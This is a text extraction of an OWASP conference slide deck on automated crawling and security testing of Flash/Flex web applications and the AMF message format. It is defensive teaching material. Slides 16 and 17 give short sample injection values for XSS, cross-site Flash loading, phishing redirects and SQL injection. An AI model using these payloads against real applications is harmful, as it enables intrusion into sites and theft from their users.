1. Copyright © The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License. The OWASP Foundation OWASP http://www.owasp.org Automated Crawling & Security Testing of Flash/Flex Web Applications Ronen Bachar Organization: IBM email: rbachar@il.ibm.comrbachar@il.ibm.com Phone: 09-9629852 14/9/2008

2. OWASP 2 Agenda  Introduction to Flash/Flex applications  AMF  High level description  AMF data format and its usage  Automated Flash Testing Challenges  Automated Crawling  Automated Testing  Overview of security risks in Flash/Flex applications

3. OWASP 3 Flash/Flex Introduction  Flash  Developed by Macromedia (now Adobe)  Flash is used to create animations, ads, and various Web components, to integrate video into web pages and, more recently, to develop RIA  Can be consumed as web page element or standalone application  Includes Scripting languages - Action Script 1, 2 & 3  Flash player  Runs Flash content (SWF file format)  Available as a plug-in for browsers (such as Mozilla Firefox and Internet Explorer) or as standalone application  Each version is completely backward-compatible

4. OWASP 4 Flash/Flex Introduction (ctd.)  Flex  Flex provides a framework for developing RIAs that run in Flash Player  Instead of forcing applications into the “animation” model, developers can program real applications using MXML (XML document) for layout user-interface components, and Action Script for programming  Requires Flash Player v9  Same File Format (SWF)  Supports only Action Script 3  AJAX-like attributes

5. OWASP 5 Flash/Flex Introduction (ctd.)  When Flash movie is embedded in Web page:  Flash  DOM: interacts with DOM by executing JavaScript code  JavaScript (HTML Host)  Flash Object Host (Browser) Flash Player Flash Movie (SWF)

6. OWASP 6 Flash in HTML page

7. OWASP 7 AMF - ActionScript Message Format  A binary message format  Used primarily to exchange data between Flash/Flex application and server side component, by serializing Action Script data types  NetConnection uses AMF to send messages to a server to asynchronously invoke remote services (RPC)  AMF 0, 3 - require Flash Player 9  AMF protocol specification is available (see references)  Understanding AMF format is crucial for manipulating (fuzzing) applications that use AMF

8. OWASP 8 AMF Format Description  Version: 0, 3  Header(s):  Header Name  Data: Serialized data (binary)  Message(s):  Target URI: Service name/Response result  Response URI: /id  Data: Serialized data (binary)

9. OWASP 9 AMF Example Request (raw format) Request (decoded) Response (decoded)

10. OWASP 10 Challenges of Crawling Flash  In order to properly test Flash/Flex-based applications, we have to crawl them  Detect server-side end-points (new URLs)  Detect client-side states and logic (Flash Application tree)  We must play the Flash movie in its “native” context  Flash movie runs in the original HTML page  Browser - include JavaScript engine (for JS  Flash interaction)  Use Flash Player plug-in  We must support dynamic content too (where script creates content on the fly), parsing is not enough!

11. OWASP 11 Challenges of Crawling Flash (Cont.)  States in Flash application  Navigation in Flash application  Blind Crawling (soundless, no pop-ups, no visuals)  Support inline movie too  Since Flash Player is designed only to play movies, its programming interface is limited

12. OWASP 12 State Management in Flash applications  Flash Applications are primarily based on animation. We encounter the following issues:  How do we identify/define “application state”?  How do we get the current state?  Figuring out that the current state is over/idle?  We define “state” as “GUI Object” container, i.e. Movie Clips, Buttons & Text Fields  Heuristics & Flash Plug-in gives us hints that the player is “idle”

13. OWASP 13 Navigation in Flash Application  Navigate Flash application in its native flow  still hard to define correct “functional flow”  Build application tree (each node represents a state)  Get current state details (GUI Objects(  Activate each GUI object according to type:  Button – click on it, move mouse over a button area.  TextField – fill it in  MovieClip – click on it  Navigating between states through Flash  Unfortunately, navigating back is not trivial  We need to store and play sequences

14. OWASP 14 Flash Application tree Root (State A) MC2 State C (State B) B1 B2 MC1 State FState EState D

15. OWASP 15  Identify controlled Flash parameters:  Query parameters (from HTML)  http://domain/movie.swf?param1=value1  FlashVars (from HTML)   Uninstantiated variables (from Action Script)  getURL (clickTag,'_self')  Locate potentially dangerous code:  Where controlled Flash parameters are used inside PDNFs (getURL, loadMovie, loadVariables, etc.)  Save sequences leading to potentially dangerous code  Associate with parameter Testing Flash Applications

16. OWASP 16 Testing Flash Applications (ctd.)  Mutation - Inject values to the parameters  XSS: parm1=javascript:window.open(‘http://my.site’)javascript:window.open(‘http://my.site’)  XSF: param2=www.movie.swfwww.movie.swf  Phishing: param3=www.my.sitewww.my.site  Validation  Play relevant sequence belongs to mutated parameter  Verify test results  Browser events  Action Script level

17. OWASP 17 Testing AMF Parameters  Testing Server-side AMF-speaking end-points  Using standard parameter tampering techniques on AMF message fields: XSS, SQLi, HTTP Response Splitting, Command Execution, Etc. ' having 1=1-- Original Request Mutated Request

18. OWASP 18 Overview of security risks in Flash/Flex applications  XSS Through Flash  Read & Write access to HTML page or javascript code  XSF  Read & Write access to SWF loader or HTML or javascript code  Phishing Through Flash  AMF Parameters  XSS, SQLi  Cross Domain Promiscuous Access  Read & Write access to HTML page or javascript code

19. OWASP 19 Recommendations  HTML Code  “allowNetworking” set to ‘internal’  “allowScriptAccess” set to ‘samedomain’  Perform data validation on variables sent to URL functions  Refining access with “crossdomain.xml”  Use fscommand or ExternalInterface.call Instead of "javascript:”  Compiler settings:  Compile Flash movie for Flash Player 8 or latter  Set Omit trace flag

20. OWASP 20 References  Creating more secure SWF web applications: http://www.adobe.com/devnet/flashplayer/articles/secur e_swf_apps.html http://www.adobe.com/devnet/flashplayer/articles/secur e_swf_apps.html  Adobe Flash Player 9 Security: http://www.adobe.com/devnet/flashplayer/articles/flash _player_9_security.pdf http://www.adobe.com/devnet/flashplayer/articles/flash _player_9_security.pdf  AMF 0 Specification: http://download.macromedia.com/pub/labs/amf/amf0_s pec_121207.pdf http://download.macromedia.com/pub/labs/amf/amf0_s pec_121207.pdf  AMF 3 Specification: http://download.macromedia.com/pub/labs/amf/amf3_s pec_121207.pdf http://download.macromedia.com/pub/labs/amf/amf3_s pec_121207.pdf  Testing Flash Applications (Stefano Di Paola / OWASP): http://www.wisec.it/en/Docs/flash_App_testing_Owasp0 7.pdf http://www.wisec.it/en/Docs/flash_App_testing_Owasp0 7.pdf